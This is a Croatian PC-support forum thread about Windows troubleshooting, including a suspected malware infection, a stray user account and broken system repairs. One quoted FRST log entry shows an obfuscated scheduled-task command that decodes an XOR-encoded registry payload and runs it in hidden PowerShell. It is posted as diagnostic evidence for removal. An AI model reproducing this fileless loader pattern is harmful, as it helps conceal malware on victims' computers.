![]() |
Rekao bih da je neki malware u pitanju jer mi taj PowerShell task nije legit, stavi HijackThis log.
https://www.bleepingcomputer.com/download/hijackthis/ Preventivno isključi pokretanje skripti, pokreni PowerShell kao admin pa pasteaj: Code:
try { |
Citiraj:
Citiraj:
|
Ima li kakvih promjena? Ovime možeš skroz disableati script host...
Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue https://www.bleepingcomputer.com/for...ery-scan-tool/ Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt. |
|
Fajlovi/šortkati su syncani s Onedrive-om (ili nekim drugim cloudom/NAS-on - Dropbox, Synology...).
|
Citiraj:
Citiraj:
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN |
Ja bih ovo maknuo:
Code:
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File) Code:
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic) |
Decki eset poceo blokat link na ovu temu. Javlja neki trojan. Pretpostavljam da je do svih ovih kodova gore pa se blesira :stoopid:
|
Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.
|
Citiraj:
A kako bi ga ti htio otvoriti? Snagom misli? |
Citiraj:
Inače mogućnost grupiranja prvo maknem jer mi se ne sviđa taj način. |
Citiraj:
Sent from my motorola edge 40 using Tapatalk |
Meh... previše klikova plus kaj moram micati ruku s miša. Ovo sa win + e otvara.
Ma samo sam htio da ako već imam shortcutove u tasbaru da ih mogu višestruko otvoriti mišem. Jbg, razmazio me Linux a i do W7 je bilo sve normalno dok nisu počeli bijesne gliste izvoditi sa sučeljem kao to je bolje. Edit: malo gunđam na Win. Bolje na Win nego na kolegice i kolege. |
Middle click na ikonu na taskbaru bi morao otvoriti još jedan prozor, koja god aplikacija da je u pitanju (samo da dopušta više instanci).
|
Ekipa, iz čista mira mi se pojavio "user1" na Windowsima.
Znači sinoć sve bilo normalno, ugasim komp, odem leć, danas ga upalim i dočeka me onaj login izbornik da odaberem s kojim userom ću se logirati u Win, moj defaultni ili taj user1. Ako kliknem na user1, pita me password. Wtf. Uđem u svoj i u settingsima pod users vidim ovo: https://i.postimg.cc/64pbkKxL/Image-007.png Da li je moguće da je neki win update napravio tog usera? EDIT: Morao ući u safe mode, cmd run as admin, "net user user1 /del" da bi izbrisao taj account. Nakon toga normalni boot u win, pa opet run netplwiz, i maknit kvačicu sa "users must enter username and password to log in to this computer", jer me bez toga svejedno zaustavljao na login screenu nakon boota. Bravo Microsoft, bravo. |
Malo je sumnjivo da su windowsi napravili taj account.
|
|
Ekipa, zna li netko kako se zove, i kako se dođe do one opcije u kojoj refreshash Windowse bez da gubiš instalirane appse ili podatke?
Prije dosta vremena naletio sam na čudan problem na jednom kompu - nisi mogao koristiti neke Win appove ili ući u postavke, kad bi to probao slika bi flashala, i pokrenuti app/postavka bi se automatski zatvorio, jednosatvno nisi ništa mogao s njima. Sjećam se da sam tada to riješio svojevrsnim "refreshom" windowsa (ili možda čak user accounta?), a sad se nikako ne mogu sjetiti kako se ta opcija zove nit kako doći do nje? Zna li netko o čemu pričam? Znači nije onaj klasični win refresh u kojem gubiš fileove ili aplikacije, ovdje ne gubiš ništa. |
Citiraj:
Razlika je što za upgrade skidaš ISO, a reset se reinstalira iz samih win (component store ili otkuda već). Možda za početak da si probaš i otvoriti CMD as admin i unutra prvo upisati: DISM /Online /Cleanup-Image /RestoreHealth Kada to odradi, onda još: sfc /scannow Nako toga restartaj win i vidi da li je pomoglo. Neke probleme ti neće riješiti niti upgrade/reset. |
Samo searchaj "Reset this PC", ili u Settings -> System -> Recovery, bar je tak na Win11
Mislim da Reset PC isto skida ISO i zapravo dela in-place upgrade |
Nakon cca3 sata srčanja, nađoh da je ono što tražim i što sam tad napravio, spomenuti in place upgrade :D
Isti se, koliko sam vidio, ne može pokrenuti reset PC / recovery opcije, već skinut iso i pokrenut ga i napravit upgrade preko postojeće instalacije. @Disco, probao bio zadnji put DISM, SFC, i hrpu drugih sličnih popravaka, sve što sam mogao izguglati na tu temu, probao sam. Na kraju me in place upgrade spasio potpune reinstalacije. Šteta što nemam vremena istraživat zbog čega je do ovog došlo i ima li još jednostavnijeg i bržeg načina da se to riješi. Znači doslovce kad se pokrene preinstalled win app, ili pokuša otvoriti settings, ili nešto iz control panela, ekran krene u flickering i jedino što možeš je zatvoriti okvir pokretanja settingsa ili appa koji stoji smrznut. Ako to probaš ponovno napraviti, onda se app odmah sam zatvori. Drugi put nailazim na taj problem. |
Citiraj:
|
Imam slučaj gadno skršenih Win10 nakon Win Updatea.
Komp bi se nakon nadogradnje pokrenuo i čim bi učitao desktop - black screen. Nije dao uć u safe mode, ništa ni u RE, nije htio ni system restore pokrenut. Onda sam ga uspio zavarat na način da sam stavio NVIDIA grafu u komp (komp ima MAD proc s integriranim GPU-om, i nakon toga sam uspio ući u windowse u safe modeu, od tamo doduše nikako nisam uspijevao maknut problematični zadnji update, al isam uspio pokrenuti system restore, no nakon vraćanja na stariju točku, kod pokretanja Windowsa dobijem BSOD s porukom "Critical process died". I nakon toga, bilo s integriranom bilo s drugom grafom, ne mogu više ni u safe mode, baca samo tu grešku svaki put. Jedino u što mogu uć je RE, a od tamo na otklanjanju poteškoća: - popravak pri pokretanju - 0 bodova, neće - postavke pokretanja - isto ništa, ne mogu ni u safe mode ni išta drugo što nudi - deinstalacija ažuriranja, isto ništa, svaki put grešku javi - vraćanje sustava - tu mi ponudi neke točke za oporavak, ali ovaj put kod odabira točke za vraćanje sustava mi kaže: "morate omogućiti zaštitu sustava na ovom pogonu" -CMD na RE: tu sam probao DISM i SFC naredbe, ali ništa od toga mi nije uspjelo, također neke greške izbacuje. Ono što sam uspio je, backupirati podatke, tako da je clean install opcija, ali bih ju svakako volio izbjeći zbog raznih softvera koje bi gore trebalo staviti. Pretpostavljam da je zajeban neki driver i da zato windowsi seru i neće se pokrenut, hardverskih greški nisam našao. Moja pitanja glase: 1) Postoji li mogućnost inplace upgradea Win 10 "izvana", sa nekog bootabilnog medija, tipa sa Strelecovog WinPEa? Ili s nekim drugim alatom? Milsim da bi to moglo riješiti stvar 2) mogu li ručno probaati iskopirati/zamijeniti neke win sistemske fileove (budući da DISM i SFC neće pokrenut? |
Nadopunjavam ako netko naiđe na isti problem - odustao od spašavanja windowsa :D
Probao sam skoro sve sa streleca što je relevantno za problem, znači apsolutno ništa nisam uspio, čak mi ni neke datoteke nije dao kopirat na koji god način probao, pa sam onda instalirao windowse bez formatiranja diska i onda iz Windows.old foldera backupirao ono što nisam upio prije toga, pa nakon toga odradio celan install. Još do sad nisam imao slučaj gdje je WinRE ovako sjeban bio da baš niš nisam mogao uspješno napraviti. |
Mislim da je za takve situacije full format jedina razumna opcija. Budeš vidio :D
|
A znam da je, to sam na kraju i napravio, no uvijek se nekako nadam da ću si skratiti muke, a nakraju si ih srčanjem i isprobavanjem produžim :D
Nego, ispada na kraju da ipak nešto krepade i nije samo softverski, jer, nakon reinstalacije radio komp nekoliko ati tip top, aond as epočeo rušiti uz novi BSOD... A bio sam istestirao sve komponenete osim MBO, sad će bit da je baš MBO u banani. |
Citiraj:
|
Roberto, ako nisi, napravi full format i instalaciju, svakako prije nego ideš ploču mijenjati.
|
Vidi gore, napravio sam clean install. Neću svakako ništa mijenjat dok nisam siguran što je.
Anyways, isprobao drugo napajanje, ram i disk, bez promjene, i onda piknuo unutra opet svoji nvidia 9600gt grafu i s njom sad radi. Znači izgleda nakon svega da je na MBO riknuo grafički modul... Riječ je o ryzenu 5 pro 4650g na gigabyte a520m-2sh ploči. |
ryzen 5 pro 4650g > https://www.techpowerup.com/cpu-spec...ro-4650g.c2325
Grafa Radeon Vega 7 je unutar cpu - a. Ako sada stabilno radi i ne čačka ti se više onda ostavi kako je. Ako želiš provjeriti šta je sa integriranom grafom treba maknuti add-on grafu, pažljivo skinuti cpu hladnjak, cpu vani, pregledati pinove u socket - u i na cpu, sve ponovo pažljivo sastaviti, pasta, obratiti pažnju na nasjedanje cpu hladnjaka ..... testiranje ... |
Sva vremena su GMT +2. Sada je 06:09. |
Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© 1999-2024 PC Ekspert - Sva prava pridržana ISSN 1334-2940
Ad Management by RedTyger